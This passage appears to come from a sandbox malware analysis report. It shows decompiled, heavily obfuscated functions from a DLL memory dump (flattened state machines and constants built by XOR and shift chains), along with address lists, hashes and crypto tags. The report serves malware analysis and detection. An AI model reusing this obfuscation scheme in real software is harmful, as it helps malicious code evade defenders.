							_push(_v1084);
							_push(_v1096);
							_push(_v1132);
							_t263 = E0087E1F8(0x861000, _v1116, __eflags);
							_t264 =  *0x886214; // 0x0
							_t267 =  *0x886214; // 0x0
							E00882D0A(_v1068, __eflags, _t267 + 0x23c, _v1088, _v1144, _v1108, 0x861000,  &_v1040, _t264 + 0x34, _t263);
							E0087FECB(_t263, _v1120, _v1072, _v1080, _v1128);
							_t322 =  &(_t322[0xe]);
							_t277 = 0x835dcf5;
							continue;
						} else {
							if(_t277 == 0x835dcf5) {
								_t273 = E0087654A(_v1076, _v1124, __eflags,  &_v520, _v1140,  &_v1040);
								_t322 =  &(_t322[3]);
								__eflags = _t273;
								_t310 =  !=  ? 1 : _t310;
								_t277 = 0xb7cde49;
								continue;
							} else {
								if(_t277 == 0xb7cde49) {
									E00877A0F(_v1092,  &_v1040, _v1056, _v1060, _v1112);
								} else {
									if(_t277 != 0xe4a3d19) {
										goto L10;
									} else {
										_t277 = 0xc59040;
										continue;
									}
								}
							}
						}
						L13:
						return _t310;
					}
					E00880DB1(_v1100,  &_v520, __eflags, _v1104, _t277, _v1064);
					_t322 =  &(_t322[3]);
					_t277 = 0x420aa66;
					L10:
					__eflags = _t277 - 0xd159d29;
				} while (__eflags != 0);
				goto L13;
			}

0x0087ad08
0x0087ad0e
0x0087ad1c
0x0087ad1e
0x0087ad23
0x0087ad27
0x0087ad2b
0x0087ad39
0x0087ad3e
0x0087ad44
0x0087ad4c
0x0087ad54
0x0087ad5c
0x0087ad64
0x0087ad69
0x0087ad71
0x0087ad79
0x0087ad81
0x0087ad89
0x0087ad91
0x0087ad99
0x0087ada1
0x0087ada9
0x0087adb1
0x0087adb9
0x0087adc1
0x0087adc9
0x0087add1
0x0087add9
0x0087ade1
0x0087aded
0x0087adf2
0x0087adf8
0x0087ae00
0x0087ae0d
0x0087ae0e
0x0087ae12
0x0087ae1a
0x0087ae22
0x0087ae2a
0x0087ae32
0x0087ae3a
0x0087ae3f
0x0087ae47
0x0087ae4f
0x0087ae54
0x0087ae5c
0x0087ae64
0x0087ae6c
0x0087ae74
0x0087ae7c
0x0087ae84
0x0087ae8c
0x0087ae94
0x0087ae99
0x0087aea1
0x0087aea9
0x0087aeb6
0x0087aec0
0x0087aec4
0x0087aecc
0x0087aed4
0x0087aee1
0x0087aee6
0x0087aeec
0x0087aef9
0x0087af06
0x0087af0e
0x0087af1b
0x0087af1e
0x0087af22
0x0087af2a
0x0087af32
0x0087af3a
0x0087af42
0x0087af4a
0x0087af5a
0x0087af5e
0x0087af66
0x0087af6b
0x0087af73
0x0087af7b
0x0087af83
0x0087af8b
0x0087af93
0x0087af9b
0x0087afa3
0x0087afaf
0x0087afb4
0x0087afba
0x0087afc2
0x0087afce
0x0087afd3
0x0087afd9
0x0087afe1
0x0087afe6
0x0087afee
0x0087aff6
0x0087affe
0x0087b006
0x0087b00e
0x0087b01a
0x0087b01f
0x0087b025
0x0087b02d
0x0087b035
0x0087b03a
0x0087b042
0x0087b04a
0x0087b056
0x0087b059
0x0087b05d
0x0087b062
0x0087b06a
0x0087b06a
0x0087b074
0x0087b0ca
0x0087b0d3
0x0087b0d7
0x0087b0df
0x0087b0e9
0x0087b108
0x0087b11b
0x0087b135
0x0087b13a
0x0087b13d
0x00000000
0x0087b076
0x0087b07c
0x0087b0b3
0x0087b0ba
0x0087b0be
0x0087b0c0
0x0087b0c3
0x00000000
0x0087b07e
0x0087b084
0x0087b187
0x0087b08a
0x0087b090
0x00000000
0x0087b096
0x0087b096
0x00000000
0x0087b096
0x0087b090
0x0087b084
0x0087b07c
0x0087b18f
0x0087b19b
0x0087b19b
0x0087b15b
0x0087b160
0x0087b163
0x0087b165
0x0087b165
0x0087b165
0x00000000

Strings

&b, xrefs: 0087AE84
r+, xrefs: 0087AF9B

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: &b$r+
API String ID: 0-3016113347
Opcode ID: cba6f158bed660ec7e551bbbf08345dd67494d98867861b940d51e63cf1dce68
Instruction ID: dc5f69964862f220540f02a70de5f315baa83620c64c17727ba63700ebe7bfdf
Opcode Fuzzy Hash: cba6f158bed660ec7e551bbbf08345dd67494d98867861b940d51e63cf1dce68
Instruction Fuzzy Hash: 6CC132B15093409FC3A8CF66C88950BFBE1FBD4758F508A1DF29686264D7B5C949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00874F74, Relevance: 2.7, Strings: 2, Instructions: 199
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00874F74() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				short* _t210;
				void* _t211;
				intOrPtr _t213;
				void* _t217;
				intOrPtr _t224;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int* _t254;

				_t254 =  &_v604;
				_v528 = 0xeac4cc;
				_v528 = _v528 | 0xab847aec;
				_t217 = 0x3550051;
				_v528 = _v528 ^ 0xabe53c27;
				_v564 = 0x85ed10;
				_v564 = _v564 << 0xe;
				_v564 = _v564 | 0x02c2a82c;
				_v564 = _v564 ^ 0x7bc732f4;
				_v548 = 0x432dfc;
				_v548 = _v548 ^ 0x2e419a47;
				_v548 = _v548 ^ 0x2e0248f0;
				_v556 = 0x7b6619;
				_t246 = 0x1c;
				_v556 = _v556 / _t246;
				_v556 = _v556 << 0x10;
				_v556 = _v556 ^ 0x68371ab0;
				_v568 = 0x76f94b;
				_t247 = 7;
				_v568 = _v568 / _t247;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x1fed9d10;
				_v572 = 0x34fb4;
				_t248 = 0xf;
				_v572 = _v572 * 0x24;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x0007943f;
				_v536 = 0xc9a576;
				_v536 = _v536 + 0xffff9d44;
				_v536 = _v536 ^ 0x00c7b609;
				_v596 = 0xae9ff5;
				_v596 = _v596 + 0xffff6f16;
				_v596 = _v596 / _t248;
				_v596 = _v596 ^ 0xfe5a1390;
				_v596 = _v596 ^ 0xfe515394;
				_v588 = 0xa8ac90;
				_t249 = 0x17;
				_v588 = _v588 / _t249;
				_v588 = _v588 << 4;
				_v588 = _v588 + 0xfffff77b;
				_v588 = _v588 ^ 0x007f9eed;
				_v600 = 0xc58072;
				_v600 = _v600 + 0xffffcbc9;
				_v600 = _v600 << 4;
				_v600 = _v600 * 0x72;
				_v600 = _v600 ^ 0x7db93259;
				_v604 = 0x4fbb0c;
				_v604 = _v604 << 0xa;
				_v604 = _v604 << 7;
				_v604 = _v604 * 0x27;
				_v604 = _v604 ^ 0xfda02730;
				_v544 = 0x5fc89d;
				_v544 = _v544 | 0x6496792e;
				_v544 = _v544 ^ 0x64dc06aa;
				_v580 = 0xa4bd54;
				_v580 = _v580 + 0xffff47e7;
				_v580 = _v580 >> 0x10;
				_v580 = _v580 + 0xffff9f11;
				_v580 = _v580 ^ 0xfff905b7;
				_v560 = 0x8ec0a6;
				_v560 = _v560 ^ 0x51bd2871;
				_t250 = 0x75;
				_v560 = _v560 / _t250;
				_v560 = _v560 ^ 0x00b97c8d;
				_v584 = 0x6990b8;
				_v584 = _v584 ^ 0x9d650ba3;
				_v584 = _v584 ^ 0x6675860f;
				_v584 = _v584 + 0xffff1bcf;
				_v584 = _v584 ^ 0xfb748c23;
				_v592 = 0xef0f92;
				_v592 = _v592 ^ 0x945975ed;
				_v592 = _v592 + 0xffff8646;
				_v592 = _v592 + 0xfffff2e1;
				_v592 = _v592 ^ 0x94bb4d80;
				_v552 = 0xcb75d7;
				_t251 = 0x65;
				_v552 = _v552 * 0x6f;
				_v552 = _v552 ^ 0xe1e1c84b;
				_v552 = _v552 ^ 0xb9d9c47b;
				_v576 = 0x1cf321;
				_v576 = _v576 + 0xffffc0e0;
				_v576 = _v576 >> 0x10;
				_v576 = _v576 << 7;
				_v576 = _v576 ^ 0x000d9bab;
				_v532 = 0x45ea0d;
				_v532 = _v532 / _t251;
				_v532 = _v532 ^ 0x000fbf52;
				_v540 = 0x89573e;
				_v540 = _v540 + 0xffffd980;
				_v540 = _v540 ^ 0x008ac7ea;
				do {
					while(_t217 != 0x2095a83) {
						if(_t217 == 0x3550051) {
							_t217 = 0xca1b903;
							continue;
						} else {
							if(_t217 == 0xba5f136) {
								_t210 = E008709DD(_v560,  &_v524, _v584, _v592);
								 *_t210 = 0;
								_t217 = 0x2095a83;
								continue;
							} else {
								_t260 = _t217 - 0xca1b903;
								if(_t217 == 0xca1b903) {
									_push(_v556);
									_push(_v548);
									_push(_v564);
									_t211 = E0087E1F8(0x861000, _v528, _t260);
									_t224 =  *0x886214; // 0x0
									_t213 =  *0x886214; // 0x0
									E00882D0A(_v572, _t260, _t213 + 0x23c, _v536, _v596, _v588, _t224 + 0x34,  &_v524, _t224 + 0x34, _t211);
									_t210 = E0087FECB(_t211, _v600, _v604, _v544, _v580);
									_t254 =  &(_t254[0xe]);
									_t217 = 0xba5f136;
									continue;
								}
							}
						}
						goto L9;
					}
					E0087437A(E0087BEFD, _v552, _v576, _v532, _v540, 0,  &_v524,  &_v524);
					_t254 =  &(_t254[6]);
					_t217 = 0x9325c58;
					L9:
					__eflags = _t217 - 0x9325c58;
				} while (__eflags != 0);
				return _t210;
			}

0x00874f74
0x00874f7a
0x00874f84
0x00874f8c
0x00874f91
0x00874f99
0x00874fa1
0x00874fa6
0x00874fae
0x00874fb6
0x00874fbe
0x00874fc6
0x00874fce
0x00874fe0
0x00874fe5
0x00874feb
0x00874ff0
0x00874ff8
0x00875004
0x00875009
0x0087500f
0x00875014
0x0087501c
0x00875029
0x0087502c
0x00875030
0x00875035
0x0087503d
0x00875045
0x0087504d
0x00875055
0x0087505d
0x0087506d
0x00875071
0x00875079
0x00875081
0x0087508d
0x00875090
0x00875094
0x00875099
0x008750a1
0x008750a9
0x008750b1
0x008750b9
0x008750c3
0x008750c7
0x008750cf
0x008750d7
0x008750dc
0x008750e6
0x008750ea
0x008750f2
0x008750fa
0x00875102
0x0087510a
0x00875112
0x0087511a
0x0087511f
0x00875127
0x0087512f
0x00875139
0x00875151
0x00875156
0x0087515c
0x00875169
0x00875171
0x00875179
0x00875181
0x00875189
0x00875191
0x00875199
0x008751a1
0x008751a9
0x008751b1
0x008751b9
0x008751c6
0x008751c7
0x008751cb
0x008751d3
0x008751db
0x008751e3
0x008751eb
0x008751f0
0x008751f5
0x008751fd
0x0087520b
0x0087520f
0x00875217
0x0087521f
0x00875227
0x0087522f
0x0087522f
0x0087523d
0x008752f2
0x00000000
0x00875243
0x00875249
0x008752df
0x008752e8
0x008752eb
0x00000000
0x0087524f
0x0087524f
0x00875251
0x00875257
0x00875260
0x00875264
0x0087526c
0x00875271
0x00875293
0x008752a6
0x008752bd
0x008752c2
0x008752c5
0x00000000
0x008752c5
0x00875251
0x00875249
0x00000000
0x0087523d
0x00875316
0x0087531b
0x0087531e
0x00875320
0x00875320
0x00875320
0x00875332

Strings

X\2, xrefs: 00875164
E, xrefs: 008751FD

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: E$X\2
API String ID: 0-703089088
Opcode ID: 43733b9f2c751078837aad86584aac44a4fdcef6ee056f7151d0200ce9223944
Instruction ID: d2ba5c5ff5545bbfc60a48e08621d57d720e37be006e8b15e47247ee0f8bc63d
Opcode Fuzzy Hash: 43733b9f2c751078837aad86584aac44a4fdcef6ee056f7151d0200ce9223944
Instruction Fuzzy Hash: F59123711083809FC768CF65D88A51BBBE1FBC5398F548A1DF29A96260D3B1CA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0086DE74, Relevance: 2.7, Strings: 2, Instructions: 193
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0086DE74() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t162;
				intOrPtr _t166;
				intOrPtr _t168;
				void* _t169;
				signed int _t171;
				signed int _t172;
				intOrPtr _t196;
				void* _t201;
				char _t202;
				signed int* _t203;
				void* _t205;

				_t203 =  &_v92;
				_v48 = 0x569f20;
				_v48 = _v48 * 0x6b;
				_t169 = 0;
				_v48 = _v48 ^ 0x2435b753;
				_t201 = 0xa773912;
				_v36 = 0xa39ca1;
				_v36 = _v36 + 0xffff508a;
				_v36 = _v36 ^ 0x00aa5884;
				_v84 = 0x943e6a;
				_v84 = _v84 >> 0xa;
				_v84 = _v84 + 0x5d77;
				_t171 = 0x78;
				_v84 = _v84 * 0xe;
				_v84 = _v84 ^ 0x0005cfbb;
				_v72 = 0x1e0d0a;
				_v72 = _v72 | 0x4cfb6fde;
				_v72 = _v72 + 0xffff94ff;
				_v72 = _v72 ^ 0x4cfa3edf;
				_v80 = 0xa086f6;
				_v80 = _v80 << 0x10;
				_v80 = _v80 >> 5;
				_v80 = _v80 + 0xffff18d5;
				_v80 = _v80 ^ 0x0432d7e2;
				_v68 = 0xb8dd27;
				_v68 = _v68 | 0xebb7bfbf;
				_v68 = _v68 ^ 0xebb8c1a9;
				_v32 = 0x418b74;
				_v32 = _v32 * 0x7e;
				_v32 = _v32 ^ 0x2049f6fa;
				_v64 = 0x577cf5;
				_v64 = _v64 * 0x64;
				_v64 = _v64 / _t171;
				_v64 = _v64 ^ 0x004a237d;
				_v76 = 0x4c7ee;
				_v76 = _v76 ^ 0x14a6b669;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x4a231390;
				_v44 = 0xd26523;
				_v44 = _v44 | 0x7504cc1f;
				_v44 = _v44 ^ 0x75d3d950;
				_v88 = 0x7e3e67;
				_v88 = _v88 >> 5;
				_v88 = _v88 + 0xfffffc49;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 ^ 0x000c6abf;
				_v40 = 0x647ef6;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00028bbb;
				_v92 = 0x531e5a;
				_v92 = _v92 << 8;
				_v92 = _v92 | 0xbedf5cfb;
				_v92 = _v92 ^ 0xffdbb821;
				_v52 = 0xaf5b7e;
				_v52 = _v52 ^ 0x54b2eb64;
				_v52 = _v52 >> 3;
				_v52 = _v52 ^ 0x0a8e907d;
				_v56 = 0x7e69cb;
				_t172 = 0x76;
				_v56 = _v56 / _t172;
				_v56 = _v56 + 0xffff7440;
				_v56 = _v56 ^ 0x00047804;
				_v60 = 0x4d1deb;
				_v60 = _v60 | 0x7db56f6d;
				_v60 = _v60 + 0xffff2308;
				_v60 = _v60 ^ 0x7dffdcf4;
				_t200 = _v28;
				_t202 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t205 = _t201 - 0xa773912;
						if(_t205 > 0) {
							break;
						}
						if(_t205 == 0) {
							_t201 = 0xa19a195;
							continue;
						}
						if(_t201 == 0x6df88bf) {
							E008654B6(_v52, _v56, _v60, _t200);
							L25:
							return _t169;
						}
						if(_t201 == 0x82168a7) {
							E00882B09(_v88, _v24, _v40, _v92);
							_t201 = 0x6df88bf;
							continue;
						}
						if(_t201 == 0x88022e2) {
							_t196 =  *0x886214; // 0x0
							E0087E0F2(_v8 + 1, _t196 + 0x23c, _v76, _v44, _v12);
							_t162 =  *0x886214; // 0x0
							_t203 =  &(_t203[3]);
							_t169 = 1;
							_t201 = 0x82168a7;
							 *((intOrPtr*)(_t162 + 0x24)) = _v16;
							continue;
						}
						if(_t201 != 0xa19a195) {
							goto L22;
						} else {
							_t202 = E0086C307();
							_t201 = 0xf928839;
							continue;
						}
					}
					if(_t201 == 0xbfd8a94) {
						if(E0086E640(_v32, _v64,  &_v24,  &_v16) == 0) {
							_t201 = 0x82168a7;
							goto L22;
						}
						_t201 = 0x88022e2;
						goto L1;
					}
					if(_t201 == 0xeffcd22) {
						_t201 = 0x6df88bf;
						if(_v28 > 2) {
							_t166 = E0087F840( *((intOrPtr*)(_t200 + 8)), _v80,  &_v20, _v68);
							_v24 = _t166;
							if(_t166 != 0) {
								_t201 = 0xbfd8a94;
							}
						}
						goto L1;
					}
					if(_t201 != 0xf928839) {
						goto L22;
					}
					_t168 = E00878C7D(_t202, _v36,  &_v28, _v84, _v72);
					_t200 = _t168;
					_t203 =  &(_t203[3]);
					if(_t168 == 0) {
						goto L25;
					}
					_t201 = 0xeffcd22;
					goto L1;
					L22:
				} while (_t201 != 0x8019399);
				goto L25;
			}

0x0086de74
0x0086de77
0x0086de8a
0x0086de8e
0x0086de90
0x0086de98
0x0086de9d
0x0086dea5
0x0086dead
0x0086deb5
0x0086debd
0x0086dec2
0x0086ded1
0x0086ded4
0x0086ded8
0x0086dee0
0x0086dee8
0x0086def0
0x0086def8
0x0086df00
0x0086df08
0x0086df0d
0x0086df12
0x0086df1a
0x0086df22
0x0086df2a
0x0086df32
0x0086df3a
0x0086df47
0x0086df4b
0x0086df53
0x0086df60
0x0086df6c
0x0086df70
0x0086df78
0x0086df80
0x0086df88
0x0086df8d
0x0086df95
0x0086df9d
0x0086dfa5
0x0086dfad
0x0086dfb5
0x0086dfba
0x0086dfc2
0x0086dfc7
0x0086dfcf
0x0086dfd7
0x0086dfdc
0x0086dfe4
0x0086dfec
0x0086dff1
0x0086dff9
0x0086e001
0x0086e009
0x0086e011
0x0086e016
0x0086e01e
0x0086e02a
0x0086e02d
0x0086e031
0x0086e039
0x0086e041
0x0086e049
0x0086e051
0x0086e059
0x0086e061
0x0086e065
0x0086e065
0x0086e069
0x0086e069
0x0086e069
0x0086e069
0x0086e06f
0x00000000
0x00000000
0x0086e075
0x0086e116
0x00000000
0x0086e116
0x0086e081
0x0086e1f3
0x0086e1fd
0x0086e203
0x0086e203
0x0086e08d
0x0086e105
0x0086e10c
0x00000000
0x0086e10c
0x0086e095
0x0086e0c1
0x0086e0d4
0x0086e0d9
0x0086e0e4
0x0086e0e7
0x0086e0e8
0x0086e0ed
0x00000000
0x0086e0ed
0x0086e09d
0x00000000
0x0086e0a3
0x0086e0ac
0x0086e0ae
0x00000000
0x0086e0ae
0x0086e09d
0x0086e126
0x0086e1c7
0x0086e1d3
0x00000000
0x0086e1d3
0x0086e1c9
0x00000000
0x0086e1c9
0x0086e132
0x0086e174
0x0086e179
0x0086e18f
0x0086e194
0x0086e19c
0x0086e1a2
0x0086e1a2
0x0086e19c
0x00000000
0x0086e179
0x0086e13a
0x00000000
0x00000000
0x0086e153
0x0086e158
0x0086e15a
0x0086e15f
0x00000000
0x00000000
0x0086e165
0x00000000
0x0086e1d8
0x0086e1d8
0x00000000

Strings

}#J, xrefs: 0086DF70
g>~, xrefs: 0086DFAD

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: g>~$}#J
API String ID: 0-4030106083
Opcode ID: 7e43c5a6ffff096e00f17ed448a4399d3e1a8fa8c1700a417f4e502cf337fdc3
Instruction ID: e3db164a8f1a44fb0d3d55b48f132bae5358fef0fe6fcbf5bdf1e972fae1f22e
Opcode Fuzzy Hash: 7e43c5a6ffff096e00f17ed448a4399d3e1a8fa8c1700a417f4e502cf337fdc3
Instruction Fuzzy Hash: 109154758083418FC758CF69C48581BFBE1FB94358F524A2EF89A96260D3B5DA09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0086E7DE, Relevance: 2.7, Strings: 2, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0086E7DE(void* __ecx, void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				void* _t159;
				signed int _t180;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				void* _t194;
				signed int* _t212;
				signed int* _t215;

				_t212 = _a8;
				_push(_a12);
				_t211 = _a4;
				_push(_t212);
				_push(_a4);
				_push(__ecx);
				E0087FE29(_t159);
				_v88 = 0xa74a92;
				_t215 =  &(( &_v128)[5]);
				_v88 = _v88 + 0x6289;
				_v88 = _v88 ^ 0x00a7ad1b;
				_t194 = 0x98d5ac6;
				_v72 = 0xabb696;
				_v72 = _v72 + 0xffffe542;
				_v72 = _v72 ^ 0x00a9fc0a;
				_v120 = 0x8dd565;
				_v120 = _v120 + 0xffff1d47;
				_v120 = _v120 + 0x56a1;
				_v120 = _v120 << 7;
				_v120 = _v120 ^ 0x46a17a82;
				_v124 = 0x8aacb4;
				_t189 = 0x6e;
				_v124 = _v124 / _t189;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x000ba54e;
				_v76 = 0x9f90a6;
				_v76 = _v76 | 0x682faec6;
				_v76 = _v76 ^ 0x68b53021;
				_v80 = 0xfbe8ab;
				_v80 = _v80 << 0xc;
				_v80 = _v80 ^ 0xbe8fb9cd;
				_v84 = 0x1efa1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x0009eae4;
				_v92 = 0xb2d03c;
				_v92 = _v92 ^ 0x8bcf93b7;
				_v92 = _v92 ^ 0x8b76d684;
				_v100 = 0x2cdd15;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0x00bdfcd6;
				_v104 = 0x2a00e4;
				_v104 = _v104 | 0x603c2e46;
				_v104 = _v104 + 0xffff11ee;
				_v104 = _v104 ^ 0x6032c829;
				_v128 = 0xd0d9f9;
				_v128 = _v128 + 0x4e1d;
				_t190 = 0x14;
				_v128 = _v128 * 0x58;
				_v128 = _v128 / _t190;
				_v128 = _v128 ^ 0x0398a77e;
				_v68 = 0x2cfb4c;
				_t191 = 0x67;
				_v68 = _v68 / _t191;
				_v68 = _v68 ^ 0x000f6b94;
				_v112 = 0x1ddb62;
				_v112 = _v112 + 0x6002;
				_v112 = _v112 << 2;
				_v112 = _v112 + 0xe88d;
				_v112 = _v112 ^ 0x0072622d;
				_v116 = 0x4c27f5;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 | 0x0ee4ea1c;
				_v116 = _v116 * 0x4e;
				_v116 = _v116 ^ 0x89b93018;
				_v108 = 0x73a5e7;
				_v108 = _v108 * 0x7d;
				_v108 = _v108 >> 1;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x3c03dbf2;
				_v64 = 0x20f8;
				_v64 = _v64 >> 0xe;
				_v64 = _v64 ^ 0x0009aa09;
				_v96 = 0x5991b1;
				_v96 = _v96 | 0x807a0890;
				_v96 = _v96 << 3;
				_v96 = _v96 ^ 0x03d0ebbf;
				do {
					while(_t194 != 0x8b4e35) {
						if(_t194 == 0x2701dd5) {
							E0087CAD5(_v68, _v112, __eflags, _v116, _t211,  &_v60);
							_t215 =  &(_t215[3]);
							_t194 = 0x8b4e35;
							continue;
						} else {
							if(_t194 == 0x3d33b80) {
								_push(_t194);
								_push(_t194);
								_t180 = E0086C5D8(_t212[1]);
								_t215 =  &(_t215[3]);
								 *_t212 = _t180;
								__eflags = _t180;
								if(__eflags != 0) {
									_t194 = 0x48381f5;
									continue;
								}
							} else {
								if(_t194 == 0x48381f5) {
									E008622A6(_t212, _v80,  &_v60, _v84);
									_t215 =  &(_t215[2]);
									_t194 = 0xae51dd8;
									continue;
								} else {
									if(_t194 == 0x62374bf) {
										_t212[1] = E00875333(_t211);
										_t194 = 0x3d33b80;
										continue;
									} else {
										if(_t194 == 0x98d5ac6) {
											_t194 = 0x62374bf;
											 *_t212 =  *_t212 & 0x00000000;
											_t212[1] = _v88;
											continue;
										} else {
											if(_t194 != 0xae51dd8) {
												goto L16;
											} else {
												E00870A90(_v92, _v100, _v104,  &_v60, _v128,  *((intOrPtr*)(_t211 + 0x20)));
												_t215 =  &(_t215[4]);
												_t194 = 0x2701dd5;
												continue;
											}
										}
									}
								}
							}
						}
						goto L17;
					}
					E0087CAD5(_v108, _v64, __eflags, _v96, _t211 + 0x18,  &_v60);
					_t215 =  &(_t215[3]);
					_t194 = 0x462b9b2;
					L16:
					__eflags = _t194 - 0x462b9b2;
				} while (__eflags != 0);
				L17:
				__eflags =  *_t212;
				_t158 =  *_t212 != 0;
				__eflags = _t158;
				return 0 | _t158;
			}

0x0086e7e7
0x0086e7ef
0x0086e7f6
0x0086e7fd
0x0086e7fe
0x0086e800
0x0086e801
0x0086e806
0x0086e80e
0x0086e811
0x0086e81b
0x0086e823
0x0086e828
0x0086e830
0x0086e838
0x0086e840
0x0086e848
0x0086e850
0x0086e858
0x0086e85d
0x0086e865
0x0086e873
0x0086e878
0x0086e87e
0x0086e883
0x0086e887
0x0086e88f
0x0086e897
0x0086e89f
0x0086e8a7
0x0086e8af
0x0086e8b4
0x0086e8bc
0x0086e8c4
0x0086e8c9
0x0086e8d1
0x0086e8d9
0x0086e8e1
0x0086e8e9
0x0086e8f9
0x0086e8fe
0x0086e906
0x0086e90e
0x0086e916
0x0086e91e
0x0086e926
0x0086e92e
0x0086e93b
0x0086e93e
0x0086e94a
0x0086e94e
0x0086e956
0x0086e962
0x0086e965
0x0086e969
0x0086e971
0x0086e979
0x0086e981
0x0086e986
0x0086e98e
0x0086e996
0x0086e99e
0x0086e9a8
0x0086e9ba
0x0086e9be
0x0086e9c6
0x0086e9d3
0x0086e9d7
0x0086e9db
0x0086e9e0
0x0086e9e8
0x0086e9f0
0x0086e9f5
0x0086e9fd
0x0086ea05
0x0086ea0d
0x0086ea12
0x0086ea1a
0x0086ea1a
0x0086ea2c
0x0086eb00
0x0086eb05
0x0086eb08
0x00000000
0x0086ea32
0x0086ea38
0x0086ead4
0x0086ead5
0x0086ead9
0x0086eade
0x0086eae1
0x0086eae3
0x0086eae5
0x0086eae7
0x00000000
0x0086eae7
0x0086ea3e
0x0086ea40
0x0086eab2
0x0086eab7
0x0086eaba
0x00000000
0x0086ea42
0x0086ea44
0x0086ea96
0x0086ea99
0x00000000
0x0086ea46
0x0086ea4c
0x0086ea85
0x0086ea87
0x0086ea8a
0x00000000
0x0086ea4e
0x0086ea54
0x00000000
0x0086ea5a
0x0086ea72
0x0086ea77
0x0086ea7a
0x00000000
0x0086ea7a
0x0086ea54
0x0086ea4c
0x0086ea44
0x0086ea40
0x0086ea38
0x00000000
0x0086ea2c
0x0086eb27
0x0086eb2c
0x0086eb2f
0x0086eb34
0x0086eb34
0x0086eb34
0x0086eb40
0x0086eb42
0x0086eb47
0x0086eb47
0x0086eb51

Strings

F.<`, xrefs: 0086E90E
-br, xrefs: 0086E98E

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -br$F.<`
API String ID: 0-3678315648
Opcode ID: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction ID: 5f368a65060dd7eacc6f5b5bd0ebacaa5e989549630f5213ed3a50d4faa0d595
Opcode Fuzzy Hash: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
Instruction Fuzzy Hash: C99120B15083819FC358CF65D98992BBBE1FBE4758F10891DF68696260D3B1DA48CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0087654A, Relevance: 2.7, Strings: 2, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0087654A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				short _v88;
				char* _v92;
				char* _v96;
				signed int _v100;
				char _v104;
				char _v624;
				char _v1144;
				void* _t168;
				signed int _t200;
				signed int _t204;
				signed int _t205;
